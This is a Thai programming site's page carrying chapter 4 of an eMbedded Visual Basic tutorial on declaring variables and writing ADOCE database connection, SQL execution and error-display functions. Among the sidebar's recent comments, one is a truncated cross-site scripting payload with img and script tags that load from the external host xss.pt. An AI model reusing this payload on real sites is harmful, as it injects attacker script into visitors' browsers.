หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  ก็ต้องลง uninstall แล้วก็ลอง install...
2019-10-22 01:56:28
  ขอบคุณค่ะ คุณ maddog ลองทำดูแ...
2019-10-21 12:32:51
  ลองทำตามนี้ดู

https://stackoverflow.c...

2019-10-16 11:39:03
  ถ้าคนอื่นเขียนให้ แล้วมั...
2019-09-17 14:01:26
  ถ้าใช้ไฟฟ้า 0 หน่วยให้ขึ้...
2019-09-17 13:59:39
  ............
2019-08-20 14:19:49
  ผมทำคลิปสอนเขียน C# หาค่า BM...
2019-08-06 11:52:23
  ทำคลิปสอนเขียนโปรแกรมคำ...
2019-04-29 09:56:21
  ผมทำคลิปสอนเขียน C# หาค่า BM...
2019-04-23 05:06:26
  ขอบคุณครับ โค้ดผิดตั้งแต...
2019-03-27 09:21:54
  Homework comment
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  ประเด็นแรก flowchart มันไม่มีภ...
2017-04-18 17:43:33
  Article comment
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  สามารถใช้ต่อกับ anycast ได้ไห...
2017-07-05 10:12:35
  ครับ คุณ "ติด" แล้วลองนึกต...
2016-06-18 15:21:09
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 eMbedded Visual Basic Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 eMbedded Visual Basic
 
 

บทที่ 4 ประกาศตัวแปร และ ฟังก์ชั่นการจัดการฐานข้อมูล

 

ขั้นตอนจะเริ่มต้นจากการประกาศตัวแปร และสร้าง ฟังก์ชั่นในการตรวจสอบ ว่าไฟล์ฐานข้อมูลมีอยู่ก่อนหน้าหรือไม่ หากมีไฟล์ฐานข้อมูลอยู่ ฟังก์ชั่นก็จะคืนค่า True (จริง) กลับมา และถ้าหากไม่จริง ก็จะคืนค่า False (เท็จ) กลับมา

จากนั้น จะเป็นการสร้างฟังก์ชั่น ต่างๆที่ใช้กับโปรเจค

  • connOpen เป็นฟังก์ชั่น ในการสร้างการติดต่อกับฐานข้อมูล
  • connClose เป็นฟังก์ชั่น ในการตัดการติดต่อกับฐานข้อมูล
  • ExecSQL เป็นฟังก์ชั่น ในการทำงานตามคำสั่ง SQL ที่ส่งมา
  • DBExists เป็นฟังก์ชั่น ในการตรวจสอบไฟล์ฐานข้อมูล ว่ามีการสร้างไว้ก่อนหน้าหรือไม่
  • DispErrors() เป็น sub ในการแสดงผลข้อผิดพลาด
 • ประกาศตัวแปร เพื่อเก็บค่าของชื่อไฟล์ของฐานข้อมูล ในส่วนของ General Declarations และตัวแปร อื่นๆที่จะนำมาใช้ในโปรเจค ดังตาราง
Option Explicit
Const gDBFileSpec = "\My Documents\test.cdb"

Const adOpenForwardOnly = 0
Const adOpenKeyset = 1
Const adOpenDynamic = 2
Const adOpenStatic = 3

Const adLockReadOnly = 1
Const adLockPessimistic = 2
Const adLockOptimistic = 3

Public conn As ADOCE.Connection
 • สร้างฟังก์ชั่น connOpen เพื่อทำการติดต่อกับฐานข้อมูล


Function connOpen() As Boolean
 
 On Error Resume Next
 
 connOpen = True
 
 If conn Is Nothing Then
  Set conn = CreateObject("ADOCE.Connection.3.0")
  conn.Open gDBFileSpec
  If conn.Errors.Count > 0 Then
   MsgBox "errors in connOpen", vbOKOnly
   DispErrors
   connOpen = False
  End If
 End If
 
 On Error GoTo 0
  
End Function

ฟังก์ชั่น connOpen จะเริ่มต้นจาก การประกาศ On Error Resume Next เพื่อให้โปรแกรมสามารถทำงาน ต่อไป เมื่อเกิดข้อผิดพลาดเกิดขึ้น ต่อจากนั้นจะทำการตรวจสอบว่า มีการติดต่อฐานข้อมูลก่อนหน้าหรือไม่ (ตัวแปร conn มีค่าเป็น ค่าว่างหรือ Nothing) ถ้าไม่การติดต่อฐานข้อมูลอยู่ก่อน ให้ทำการสร้าง การติดต่อผ่านทางการสร้าง ออปเจ็ค ADOCE.Connection.3.0 หลังจากนั้นจะตรวจสอบข้อผิดพลาดว่าเกิดขึ้นหรือไม่ หากเกิดข้อผิดพลาดขึ้น จะทำการแสดงข้อความแจ้ง และแสดงรายละเอียดผ่านทาง DispErrors พร้อมทั้งกำหนดค่าส่งกลับของฟังก์ชั่น เป็นค่า False เพื่อให้ กระบวนการที่เรียกใช้ ฟังก์ชั่น ทราบว่า ไม่สามารถสร้างการติดต่อฐานข้อมูลได้

 • สร้างฟังก์ชั่น connClose เพื่อตัดการติดต่อกับฐานข้อมูล


Sub connClose()
 
 On Error Resume Next
 conn.Close
 Set conn = Nothing
 On Error GoTo 0

End Sub

การสั่งเพื่อตัดการติดต่อกับฐานข้อมูล ทำโดยสั่งใช้เมธอด Close และ ลบค่าของตัวแปร conn ให้เป็นค่าว่าง

 • สร้างฟังก์ชั่น ExecSQL เพื่อให้ฐานข้อมูล ทำตามคำสั่ง SQL ที่ส่งมา


Function ExecSQL(paramSQL As String, paramSuccess As String, paramErr As String) As Boolean
 
 If DBExists(gDBFileSpec) = True Then
 
  connOpen
  On Error Resume Next
  conn.Execute (paramSQL)
  On Error GoTo 0
  If conn.Errors.Count > 0 Then
   ExecSQL = False
   txtDB.Text = paramErr
  Else
   ExecSQL = True
   txtDB.Text = paramSuccess
  End If
  connClose
 
 Else
  
  MsgBox "Database " & gDBFileSpec & " does not exist!", vbOKOnly, "No database"
 
 End If

End Function

การทำงานเริ่มจากการตรวจสอบไฟล์ฐานข้อมูล ว่ามีอยู่หรือไม่ ถ้าไม่มีไฟล์ฐานข้อมูล จะมีการแจ้งข้อผิดพลาด แต่ถ้าหากว่ามีไฟล์ ฐานข้อมูล ก็จะทำการสร้างการติดต่อ หลังจากนั้นจะทำการสั่งให้ฐานข้อมูลทำงานตาม สั่ง SQL ที่ส่งเข้า ทำให้สามารถสั่งให้ฐานข้อมูล เพิ่ม, ลบ, แสดง ข้อมูลออกมาได้

 • สร้างฟังก์ชั่น DBExists เพื่อใช้ ในการตรวจสอบไฟล์ฐานข้อมูล ว่ามีการสร้างไว้ก่อนหน้าหรือไม่
Private Function DBExists(paramFileSpec As String) As Boolean
 
 If FileSystem1.Dir(paramFileSpec) <> "" Then
  DBExists = True
 Else
  DBExists = False
 End If

End Function

การทำงานจะเป็นการตรวจสอบ โดยใช้เมธอด Dir ของ FileSystem1 ที่เราได้ทำการสร้างโดยดับเบิ้ลคลิก มาวางไว์บน Form จากขั้นตอนแรกๆ ที่ผ่านมา ฟังก์ชั่นนี้ จะส่งค่ากลับเป็น True (จริง) เป็นมีไฟล์ฐานข้อมูล และส่งค่ากลับเป็น False (เท็จ) เมื่อ ไม่พบไฟล์ ฐานข้อมูล

 • สร้าง Sub DispErrors เพื่อใช้ ในการแสดงผลข้อผิดพลาดที่เกิดขึ้น
Sub DispErrors()
Dim dispErr As String
Dim arb1 As Integer
Dim arb2 As Integer
Dim ADOErr As ADOCE.Error

 For arb1 = 0 To conn.Errors.Count - 1
  Set ADOErr = conn.Errors(arb1)
  dispErr = "desc = " & ADOErr.Description & vbCrLf
  dispErr = dispErr & "number = " & Hex(ADOErr.Number) & vbCrLf
  dispErr = dispErr & "nativeerror = " & ADOErr.NativeError & vbCrLf
  dispErr = dispErr & "source = " & ADOErr.Source
  MsgBox dispErr, vbCritical, strTitleBar
 Next arb1

End Sub

การตรวจสอบข้อผิดพลาด ของ sub นี้จะกระทำผ่านทาง Property ต่างๆของ ADOErr ที่รับค่าจาก ข้อผิดพลาดของ conn (ค่าจาก conn.Errors) ซึ่งมีอยู่หลายรายการ และอาศัยการวนลูป เพื่อดึงรายการข้อผิดพลาดทั้งหมด ขึ้นมาแสดง

มีการใช้งาน On Error Resume Next เพื่อให้โปรแกรม สามารถทำงานต่อไปได้เมื่อเกิดข้อผิดพลาดขึ้น และมีการใช้ On Error GoTo 0 เพื่อสั่งให้สิ้นสุดความพยายามในการทำงานต่อ จากการ Resume Next ทำให้เป็นการสิ้นสุดการทำงาน ดังนั้นจะเห็นได้ว่า มีการสั่งงานของชุดคำสั่งทั้งสอง คู่กันเสมอ ในตัวอย่างนี้

 

BACK

7in1 USB-C Hub Dual Type-C Multiport Card Reader Adapter 4K HDMI For MacBook Pro
7in1 USB-C Hub Dual Type-C Multiport Card Reader Adapter 4K HDMI For MacBook Pro
สายต่อจอ สำหรับเครื่อง macbook pro 2016 (usb-c to HDMI)
สายต่อจอ สำหรับเครื่อง macbook pro 2016 (usb-c to HDMI) ความละเอียดระดับ 4K
หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++ Tutorial
Java Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th